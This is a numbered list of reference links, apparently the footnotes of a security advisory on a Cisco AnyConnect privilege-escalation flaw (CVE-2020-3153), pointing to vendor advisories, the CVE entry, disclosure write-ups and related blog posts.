[1] https://www.securify.nl/advisory/SFY20200419/cisco-anyconnect-elevation-of-privileges-due-to-insecure-handling-of-path-names.html
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3153
[3] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ac-win-path-traverse-qO4HWBsj
[4] https://ssd-disclosure.com/ssd-advisory-cisco-anyconnect-privilege-elevation-through-path-traversal/
[5] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvs46327
[6] https://expertmiami.blogspot.nl/2015/06/cisco-anyconnect-secure-mobility-client.html
[7] /en/advisory/SFY20150601/cisco-anyconnect-elevation-of-privileges-via-dll-side-loading.html
[8] https://bugs.chromium.org/p/project-zero/issues/detail?id=460
[9] https://www.serializing.me/2016/12/14/anyconnect-elevation-of-privileges-part-1/
[10] https://docs.microsoft.com/en-us/windows/deployment/planning/windows-10-removed-features



